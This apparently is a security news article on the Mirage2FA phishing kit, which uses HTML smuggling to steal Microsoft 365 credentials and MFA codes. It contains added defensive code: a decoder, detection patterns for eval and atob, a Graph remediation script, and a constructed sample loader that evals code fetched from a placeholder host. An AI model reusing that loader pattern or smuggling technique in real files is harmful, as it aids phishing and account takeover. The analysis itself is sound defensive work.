
Mirage2FA phishing kit steals Microsoft 365 credentials via HTML smuggling

Summary

– Fortra identified Mirage2FA, a phishing kit that uses HTML smuggling and obfuscated JavaScript to deliver fake Microsoft 365 login pages and harvest credentials together with the victim's MFA responses.
– The campaign used business-themed email lures, such as secure-document notices and payment requests, to get users to open the malicious HTML attachment.
– The first-stage HTML payload hides its logic behind Base64 encoding, a single-byte XOR (0xAD) and eval(), and uses that decoded code to load a second-stage script from attacker-controlled infrastructure.
– The second-stage phishing page mimicked the Microsoft 365 sign-in flow with a fake CAPTCHA, credential fields, and prompts for multiple MFA methods, including authenticator apps and number matching.
– Fortra advised that affected users reset passwords, revoke sessions and refresh tokens, review MFA methods and mailbox rules, and check OAuth grants to contain the account-takeover risk.

A newly identified phishing kit, tracked as Mirage2FA, targets Microsoft 365 users by combining HTML smuggling with obfuscated JavaScript to steal credentials and capture MFA responses, so the kit works even when multi-factor authentication is enabled. Researchers at Fortra uncovered the campaign while analyzing a suspicious HTML/JavaScript email attachment, supported by DNS data and the final phishing page.

The attack chain begins with business-themed lures: secure-document notifications, remittance notices, automated billing requests and payment alerts. When the user opens the HTML attachment, it renders a Microsoft-branded page styled as a protected business document. The first-stage payload carries its real logic as an obfuscated blob to evade static detection: the script Base64-decodes the blob, XORs each byte with 0xAD, converts the result to a string with TextDecoder, and runs it with eval(). That decoded code loads a second-stage script from attacker-controlled infrastructure at user[.]cheacker[.]store.
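The decode chain just described can be reversed on the analyst's side without ever executing the payload. The following is an added example written for this page in Node.js, not Fortra's tooling and not the kit's own code: it undoes Base64, the single-byte XOR and the TextDecoder step, brute-forces the XOR key when it is unknown (a generalisation beyond the reported 0xAD), pulls loader URLs out of the recovered stage, and flags the decode/exec primitives in a first-stage HTML file. The sample first and second stages, the placeholder host user.example.invalid and the scoring heuristic are this example's own constructions.

```javascript
// Added example, not Fortra's code and not the Mirage2FA kit: an analyst-side decoder that
// reverses the Base64 -> XOR 0xAD -> TextDecoder chain described above WITHOUT calling eval().
// Runs on Node 18+ (Buffer, TextEncoder/TextDecoder are built in). Everything marked
// "constructed" below is this example's own sample data, not the real payload.

const XOR_KEY = 0xad; // single-byte key reported in the analysis

// Reverse the loader's decode steps and return the plaintext second stage as a string.
function decodeStage(b64, key = XOR_KEY) {
  const bytes = Buffer.from(b64, "base64");
  const plain = new Uint8Array(bytes.length);
  for (let i = 0; i < bytes.length; i++) plain[i] = bytes[i] ^ key;
  return new TextDecoder("utf-8").decode(plain); // same final step the loader takes before eval()
}

// Forward direction; used here only to build the constructed sample payload.
function encodeStage(text, key = XOR_KEY) {
  const raw = new TextEncoder().encode(text);
  const out = Buffer.alloc(raw.length);
  for (let i = 0; i < raw.length; i++) out[i] = raw[i] ^ key;
  return out.toString("base64");
}

// Heuristic score for a candidate plaintext: share of printable/whitespace characters plus
// one point per token that loader JavaScript almost always contains. A wrong key can keep the
// text printable (a one-bit key error only flips case or punctuation) but never reproduces
// these tokens, so the tokens break ties.
const JS_TOKENS = ["document", "script", "src", "http", "function", "window", "eval"];
function scoreCandidate(text) {
  let printable = 0, total = 0;
  for (const ch of text) {
    const c = ch.codePointAt(0);
    total++;
    if ((c >= 0x20 && c <= 0x7e) || c === 0x0a || c === 0x0d || c === 0x09) printable++;
  }
  const hits = JS_TOKENS.reduce((n, t) => n + (text.includes(t) ? 1 : 0), 0);
  return (total ? printable / total : 0) + hits;
}

// Generalisation beyond the page: if the key is unknown, try all 256 single-byte keys and
// keep the best-scoring plaintext. The true key yields readable JavaScript.
function bruteForceKey(b64) {
  let best = { key: -1, score: -1, text: "" };
  for (let k = 0; k < 256; k++) {
    const text = decodeStage(b64, k);
    const score = scoreCandidate(text);
    if (score > best.score) best = { key: k, score, text };
  }
  return best;
}

// Harvest remote-load URLs from a decoded stage for IOC extraction.
function extractUrls(js) {
  return [...js.matchAll(/https?:\/\/[^\s"'`<>)]+/g)].map((m) => m[0]);
}

// Cheap static triage of a FIRST-stage HTML attachment: which decode/exec primitives does it use?
function smugglingIndicators(html) {
  const checks = {
    atob: /\batob\s*\(/,
    textDecoder: /\bTextDecoder\b/,
    xor: /\^\s*0x[0-9a-f]{2}\b/i,
    eval: /\beval\s*\(/,
  };
  return Object.keys(checks).filter((k) => checks[k].test(html));
}

// Constructed second stage: points at a placeholder host, not the real kit or its infrastructure.
const SAMPLE_STAGE2 =
  'var s=document.createElement("script");\n' +
  's.src="https://user.example.invalid/loader.js";\n' +
  "document.head.appendChild(s);";
const SAMPLE_B64 = encodeStage(SAMPLE_STAGE2);

// Constructed first-stage fragment in the shape the article describes (atob -> XOR -> TextDecoder -> eval).
const SAMPLE_STAGE1 =
  '<script>var p="' + SAMPLE_B64 + '";var b=atob(p);var u=new Uint8Array(b.length);' +
  "for(var i=0;i<b.length;i++)u[i]=b.charCodeAt(i)^0xAD;eval(new TextDecoder().decode(u));</script>";

console.log(decodeStage(SAMPLE_B64));
console.log("brute-forced key: 0x" + bruteForceKey(SAMPLE_B64).key.toString(16));
console.log("loader URLs:", extractUrls(decodeStage(SAMPLE_B64)));
console.log("stage-1 indicators:", smugglingIndicators(SAMPLE_STAGE1));
```

To use it on a real sample, paste the Base64 blob from the attachment into decodeStage (or bruteForceKey if the kit has rotated the key) and feed the result to extractUrls; because nothing is eval'd, the loader never reaches the attacker's host. The smugglingIndicators check is a triage aid, not a verdict: legitimate pages also call atob and eval, so treat all four indicators together in a single attachment as the signal.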

The domain cheacker[.]store was registered on March 16, suggesting a short-lived, purpose-built campaign. The second-stage page mimics the Microsoft 365 sign-in flow: a fake CAPTCHA gate, credential fields, and prompts for several MFA methods, including authenticator-app approval and number matching. Fortra's analysis also found code for an SMS verification path, though that workflow was not confirmed during testing.

“The likely goal is Microsoft 365 account takeover. If a user submitted credentials, the attacker may have been able to access email, files, Teams messages, SharePoint content, and other connected SaaS resources,” the researchers noted.

Fortra published indicators of compromise, including the domains cheacker[.]store and user[.]cheacker[.]store, an associated IP address, and specific JavaScript resource paths. Any user who opened the phishing page or submitted information should immediately reset their password, revoke active sessions and refresh tokens, review registered MFA methods, inspect mailbox rules, and check OAuth grants.
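The remediation steps above map onto a handful of Microsoft Graph calls. The block below is an added example written for this page in Node.js, not Fortra's script and not a Microsoft-provided tool: it orders the steps (password reset, then session and refresh-token revocation, then evidence collection), runs them through an injectable fetch, and triages what comes back, flagging MFA methods registered after the assumed compromise time, inbox rules that forward, redirect, delete or bury mail, and OAuth grants carrying mailbox-reading scopes. The Graph v1.0 endpoints are the documented ones; the user principal name, token, temporary password, compromise timestamp, "risky" lists and the sample responses are this example's own assumptions.

```javascript
// Added example, not Fortra's script and not a Microsoft-provided tool: the post-compromise
// steps above expressed as Microsoft Graph v1.0 calls against one account, plus triage of the
// responses. Node 18+ (global fetch). Endpoints are the documented Graph ones; the user, token,
// temporary password, compromise time, sample responses and "risky" lists are assumptions.

const GRAPH = "https://graph.microsoft.com/v1.0";

// Delegated scopes that let a consented app keep reading or sending mail after the password
// reset, so a grant carrying them must be reviewed and most likely removed.
const RISKY_SCOPES = ["Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
  "Files.Read.All", "Files.ReadWrite.All", "offline_access"];

// Ordered requests: reset the password first, then revoke refresh tokens and sessions,
// then collect the evidence that needs a human look.
function buildRemediationPlan(userId, temporaryPassword) {
  const u = `${GRAPH}/users/${encodeURIComponent(userId)}`;
  return [
    { step: "resetPassword", method: "PATCH", url: u,
      body: { passwordProfile: { forceChangePasswordNextSignIn: true, password: temporaryPassword } } },
    { step: "revokeSessions", method: "POST", url: `${u}/revokeSignInSessions` },
    { step: "authMethods", method: "GET", url: `${u}/authentication/methods` },
    { step: "inboxRules", method: "GET", url: `${u}/mailFolders/inbox/messageRules` },
    { step: "oauthGrants", method: "GET", url: `${u}/oauth2PermissionGrants` },
  ];
}

// Execute the plan in order; fetchImpl is injectable so the flow can be exercised offline.
async function runPlan(plan, accessToken, fetchImpl = fetch) {
  const results = {};
  for (const req of plan) {
    const res = await fetchImpl(req.url, {
      method: req.method,
      headers: { Authorization: `Bearer ${accessToken}`, "Content-Type": "application/json" },
      body: req.body ? JSON.stringify(req.body) : undefined,
    });
    if (!res.ok) throw new Error(`${req.step}: HTTP ${res.status}`);
    results[req.step] = res.status === 204 ? null : await res.json();
  }
  return results;
}

// MFA methods registered at or after the assumed compromise time are attacker candidates.
// Phone methods carry no createdDateTime in Graph, so they are not caught here: review them by hand.
function flagAuthMethods(methods, since) {
  const cutoff = Date.parse(since);
  return methods
    .filter((m) => m.createdDateTime && Date.parse(m.createdDateTime) >= cutoff)
    .map((m) => ({ id: m.id, type: m["@odata.type"], displayName: m.displayName || "", createdDateTime: m.createdDateTime }));
}

// Classic post-takeover rules: forward/redirect mail out, or delete / mark-read-and-bury it.
function flagInboxRules(rules) {
  const FORWARDING = ["forwardTo", "forwardAsAttachmentTo", "redirectTo"];
  return rules
    .filter((r) => {
      if (r.isEnabled === false) return false;
      const a = r.actions || {};
      const forwards = FORWARDING.some((k) => Array.isArray(a[k]) && a[k].length > 0);
      const hides = a.delete === true || (a.markAsRead === true && typeof a.moveToFolder === "string");
      return forwards || hides;
    })
    .map((r) => ({ id: r.id, displayName: r.displayName, actions: Object.keys(r.actions || {}) }));
}

// Grants whose space-separated scope string includes a risky permission.
function flagOAuthGrants(grants) {
  return grants
    .map((g) => ({ id: g.id, clientId: g.clientId, consentType: g.consentType,
      riskyScopes: (g.scope || "").split(/\s+/).filter((s) => RISKY_SCOPES.includes(s)) }))
    .filter((g) => g.riskyScopes.length > 0);
}

function triage(results, compromisedSince) {
  return {
    newAuthMethods: flagAuthMethods(results.authMethods.value, compromisedSince),
    riskyInboxRules: flagInboxRules(results.inboxRules.value),
    riskyOAuthGrants: flagOAuthGrants(results.oauthGrants.value),
  };
}

// Constructed responses in the shape Graph returns (IDs, names and dates are invented).
const SAMPLE_RESULTS = {
  authMethods: { value: [
    { "@odata.type": "#microsoft.graph.microsoftAuthenticatorAuthenticationMethod", id: "a1", displayName: "Work phone", createdDateTime: "2025-01-10T08:00:00Z" },
    { "@odata.type": "#microsoft.graph.phoneAuthenticationMethod", id: "p1", phoneNumber: "+1 5550100", phoneType: "mobile" },
    { "@odata.type": "#microsoft.graph.microsoftAuthenticatorAuthenticationMethod", id: "a2", displayName: "Unknown device", createdDateTime: "2025-03-17T02:14:00Z" },
  ] },
  inboxRules: { value: [
    { id: "r1", displayName: "Newsletters", isEnabled: true, actions: { moveToFolder: "folder-id-1" } },
    { id: "r2", displayName: ".", isEnabled: true, actions: { markAsRead: true, moveToFolder: "folder-id-2", delete: true } },
    { id: "r3", displayName: "fwd", isEnabled: true, actions: { forwardTo: [{ emailAddress: { address: "drop@example.invalid" } }] } },
  ] },
  oauthGrants: { value: [
    { id: "g1", clientId: "sp-1", consentType: "Principal", principalId: "user-obj-id", scope: "User.Read" },
    { id: "g2", clientId: "sp-2", consentType: "Principal", principalId: "user-obj-id", scope: "Mail.ReadWrite Mail.Send offline_access" },
  ] },
};

const SINCE = "2025-03-16T00:00:00Z"; // assumed compromise time
const demoPlan = buildRemediationPlan("victim@contoso.example", "Tmp-Reset-Pass-1!");

// Offline demo: a fake fetch that answers each planned request from SAMPLE_RESULTS.
const fakeFetch = async (url) => {
  const body = SAMPLE_RESULTS[demoPlan.find((p) => p.url === url).step];
  return { ok: true, status: body ? 200 : 204, json: async () => body };
};
runPlan(demoPlan, "fake-token", fakeFetch).then((r) => console.log(JSON.stringify(triage(r, SINCE), null, 2)));
```

Against a tenant, replace fakeFetch with the real fetch and pass a token whose permissions cover each endpoint (the required Graph permissions differ per call; check the permission reference rather than this example), and generate the temporary password randomly instead of hard-coding it. Two caveats the code does not handle: Graph pages long collections via @odata.nextLink, so follow it for mailboxes with many rules or grants; and revokeSignInSessions invalidates refresh tokens and sessions but not access tokens already issued, which remain valid until they expire.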

(Source: Help Net Security)
